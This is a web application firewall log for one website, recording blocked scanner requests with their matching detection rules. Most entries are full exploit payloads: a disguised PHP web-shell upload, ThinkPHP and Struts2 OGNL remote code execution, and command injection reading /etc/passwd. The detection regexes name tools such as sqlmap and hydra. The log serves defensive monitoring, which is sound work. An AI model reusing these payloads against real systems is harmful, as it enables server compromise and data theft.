/home/wwwlogs/free_waf_log
["2023-12-09 00:55:05","221.150.78.114","POST","\/\/cms\/manage\/admin.php?m=manage&c=background&a=action_flashUpload","python-requests\/2.31.0","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/\/cms\/manage\/admin.php?m=manage&c=background&a=action_flashUpload HTTP\/1.1\nhost:www.boyaminge.com\ncontent-type:multipart\/form-data; boundary=3c020396fc5bd06029705525f14f7ab0\nconnection:keep-alive\naccept:*\/*\ncontent-length:373\naccept-encoding:gzip, deflate\nuser-agent:python-requests\/2.31.0\n\n--3c020396fc5bd06029705525f14f7ab0\r\nContent-Disposition: form-data; name=\"filePath\"; filename=\"report.php\"\r\nContent-Type: video\/x-flv\r\nExpires: 0\r\n\r\nGIF89a\r\n<?php\r\nfunction _host()\r\n{\r\n $a=str_replace('','',$_REQUEST[admin]);\r\n return ';'.$a;\r\n}\r\n$sql = @mysqli_connect(@eval('echo NULL'._host()),\"xxx\",\"xxx\",\"xxxx\");?>\r\n--3c020396fc5bd06029705525f14f7ab0--\r\n"] ["2023-12-09 01:35:51","34.232.51.180","GET","\/h5\/js\/chunk-5bfab075.a4a34987.js","Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d","GET \/h5\/js\/chunk-5bfab075.a4a34987.js HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept-encoding:gzip\naccept-charset:utf-8\nuser-agent:Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d\n\n"] ["2023-12-09 03:24:46","221.150.78.114","GET","\/\/?s=..\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1155.40 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET 
\/\/?s=..\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1155.40 Safari\/537.36\n\n"] ["2023-12-09 03:25:29","221.150.78.114","GET","\/\/?s=..\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1641.132 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=..\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1641.132 Safari\/537.36\n\n"] ["2023-12-09 03:26:06","221.150.78.114","GET","\/\/?s=\/index\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.234.53 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/index\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.234.53 Safari\/537.36\n\n"] ["2023-12-09 
03:26:45","221.150.78.114","GET","\/\/?s=\/index\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1283.27 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/index\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1283.27 Safari\/537.36\n\n"] ["2023-12-09 03:27:36","221.150.78.114","GET","\/\/?s=\/Home\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/61.0.1810.85 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/Home\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/61.0.1810.85 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}","Mozilla\/5.0 
(X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/53.0.2820.59 Safari\/537.36","args","\\:\\$ >> redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}","GET \/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/53.0.2820.59 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","POST","\/general\/index\/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/general\/index\/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP\/1.1\nhost:www.boyaminge.com\ncontent-type:multipart\/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\nconnection:close\ncontent-length:235\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n--e64bdf16c554bbc109cecef6451c26a4\r\nContent-Disposition: form-data; name=\"Filedata\"; 
filename=\"2ZHwJShFgRmUDxtYk96vJNbzonO.php\"\r\nContent-Type: image\/jpeg\r\n\r\n<?php echo md5('CNVD-2021-49104');?>\r\n\r\n--e64bdf16c554bbc109cecef6451c26a4--\r\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}","Mozilla\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36","args","\\:\\$ >> redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}","GET \/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36\n\n"] ["2023-12-09 
11:24:08","221.150.72.75","GET","\/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20\/etc\/passwd","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","(?:etc\\\/\\W*passwd) >> cmd:cat \/etc\/passwd","GET \/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20\/etc\/passwd HTTP\/1.1\nhost:www.boyaminge.com\naccept-encoding:gzip\nconnection:close\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/cgi-bin\/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;\/root\/kerbynet.cgi\/scripts\/getkey%20..\/..\/..\/etc\/passwd;%22","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/37.0.2062.124 Safari\/537.36","args","\\.\\.\/\\.\\.\/ >> type:*\";\/root\/kerbynet.cgi\/scripts\/getkey ..\/..\/..\/etc\/passwd;\"","GET 
\/cgi-bin\/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;\/root\/kerbynet.cgi\/scripts\/getkey%20..\/..\/..\/etc\/passwd;%22 HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/37.0.2062.124 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D","Mozilla\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36","args","\\:\\$ >> redirect:${#context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,#f=#_memberAccess.getClass().getDeclaredField(\"allowStaticMethodAccess\"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec(\"sh -c id\").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}","GET 
\/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","\\$\\{ >> response_type:${13337*73331}","GET \/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","60秒以内累计超过6次以上非法请求,封锁180秒","GET \/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test 
HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"]